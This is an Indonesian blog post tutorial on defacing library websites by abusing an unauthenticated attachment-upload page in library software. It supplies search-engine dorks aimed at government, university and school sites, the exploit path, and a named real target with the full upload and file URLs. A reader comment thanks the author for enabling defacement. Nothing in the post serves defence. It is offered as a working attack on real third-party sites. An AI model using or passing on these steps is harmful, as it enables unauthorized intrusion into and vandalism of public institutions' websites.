Wednesday, December 13, 2017

Deface File Attachment Upload Repository

Hae, berjumpa lagi dengan testa. Kali ini testa akan memberikan tutor Deface poc File Attachment Upload Repository. Langsung saja.

1. Bahan :

  1. Internet
  2. PC/HP
  3. Script ext .txt
2. Dork :
  • inurl:/admin/modules/bibliography/pop_attach.php
  • pustaka.*.go.id
  • pustaka.*.ac.id
  • pustaka.*.sch.id
  • pustaka.*.(isi dengan domain yang kalian mau :v)
3.Exploit : /admin/modules/bibliography/pop_attach.php

4.Langkah-langkah :
  • Pertama, kita dorking menggunakan salah satu dork diatas.
  • Kedua, pilih salah satu target.
  • Ketiga, masukan exploit diatas dibelang site/
contoh
http://library.stikessarimulia.ac.id/
Ditambah exploit menjadi :
http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php
  • Keempat, kita isi namanya dan upload file.

Lalu klik "unggah sekarang".
  • Kelima, kita panggil filenya, lokasi file : site/repository/yourfile.txt
contoh : http://library.stikessarimulia.ac.id/repository/011.txt

5. Live target :
Selesai :V
Sekian dulu, kalo ada yang kurang mengerti comment saja.

Author : Oc-Tech7

2 comments

Wooaaa Terimakasih anonimokerl dengan adanya ini saya bisa defacr


EmoticonEmoticon